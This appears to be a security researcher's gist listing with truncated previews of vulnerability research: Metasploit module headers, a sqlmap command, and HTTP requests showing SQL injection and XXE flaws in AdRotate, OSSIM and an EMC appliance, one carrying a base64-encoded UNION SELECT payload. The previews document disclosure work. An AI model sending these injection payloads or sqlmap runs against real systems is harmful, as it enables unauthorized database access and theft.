Brandon Perry brandonprry

## gist:8947140
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'digest/md5'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

## gist:9199424
bperry@w00den-pickle:~/tools/sqlmap$ rm -rf output/
bperry@w00den-pickle:~/tools/sqlmap$ ./sqlmap.py -r /tmp/req.req --level=5 --risk=3 --technique=u --tamper=base64encode

    sqlmap/1.0-dev-58eac36 - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 17:18:53

## gist:9198941
GET /wp-content/plugins/adrotate/library/clicktracker.php?track=LTEgVU5JT04gQUxMIFNFTEVDVCAzLDEsMSwxLS0= HTTP/1.1
Accept-Language: en-us
Accept-Encoding: gzip,deflate
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_1) AppleWebKit/537.73.11 (KHTML, like Gecko) Version/7.0.1 Safari/537.73.11
Host: 192.168.1.63


--------

## gist:9200346
HTTP request [#1]:
GET /wp-content/plugins/adrotate/library/clicktracker.php?track=1 HTTP/1.1
Accept-language: en-us,en;q=0.5
Accept-encoding: gzip,deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-agent: sqlmap/1.0-dev-58eac36 (http://sqlmap.org)
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: 192.168.1.63
Pragma: no-cache
Cache-control: no-cache,no-store

## gist:9330240
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

## lifesize_admin_ping.rb
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

## gist:9814819
%define debug_package %{nil}

Name:           mono
Version:        3.2.6
Release:        1%{?dist}
Summary:        ZOS Mono

License:        MIT
URL:            http://www.google.com
Source0:        mono.tar.gz

## gist:9874177
The following request is vulnerable to a SQL injection attack from authenticated users.

GET /ossim/report/BusinessAndComplianceISOPCI/ISO27001Bar1.php?date_from=2014-02-28&date_to=2014-03-30 HTTP/1.1
Host: 172.31.16.150
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://172.31.16.150/ossim/report/wizard_run.php?run=ZmRzYWZkc2EjIyNhZG1pbg==
Cookie: PHPSESSID=jllhuhmphk6ma5q8q2i0hm0mr1;
Connection: keep-alive

## gist:9895721
EMC Cloud Tiering Appliance v10.0 Unauthed XXE

The following authentication request is susceptible to an XXE attack:

POST /api/login HTTP/1.1
Host: 172.31.16.99
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate

## gist:9921280
The following request is vulnerable to a SQL injection attack from authenticated users.

GET /ossim/report/BusinessAndComplianceISOPCI/ISO27001Bar1.php?date_from=2014-02-28&date_to=2014-03-30 HTTP/1.1
Host: 172.31.16.150
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://172.31.16.150/ossim/report/wizard_run.php?run=ZmRzYWZkc2EjIyNhZG1pbg==
Cookie: PHPSESSID=jllhuhmphk6ma5q8q2i0hm0mr1;
Connection: keep-alive